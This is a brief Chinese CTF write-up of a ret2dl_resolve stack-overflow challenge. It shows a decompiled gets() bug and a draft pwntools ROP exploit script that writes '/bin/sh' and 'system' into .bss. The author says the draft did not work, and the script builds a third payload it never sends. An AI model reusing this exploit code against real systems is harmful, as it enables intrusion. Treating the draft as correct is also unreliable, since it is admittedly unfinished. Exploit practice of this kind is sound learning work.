ret2dl_resolve ,但是不会做…
首先自然是先 checksec,只开了一个 NX:
惯例拖进 IDA,主函数比较简单,就是一个平平无奇的 gets() :
1
2
3
4
5
6
7
| int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[8];
gets(v4, argv, envp);
return 0;
}
|
简单写了一版 exp 雏形,好像没打通,后面有时间再改了…
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| from pwn import *
p = process('./resolve')
offset = 0x8
bss = 0x404030
pop_rdi_ret = 0x4011C3
main_addr = 0x401136
gets_plt = 0x401040
payload1 = b'A' * offset + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(bss + 0x200) + p64(gets_plt) + p64(main_addr)
p.sendline(payload1)
p.sendline(b"/bin/sh")
payload2 = b'A' * offset + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(bss + 0x100) + p64(gets_plt) + p64(main_addr)
p.sendline(payload2)
p.sendline(b"system")
payload3 = b'A' * offset + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(0x400408) + p64(gets_plt) + p64(pop_rdi_ret) + p64(bss + 0x200) + p64(gets_plt)
p.sendline(p32(bss + 0x100 - 0x400420) + b"\x12")
p.interactive()
|
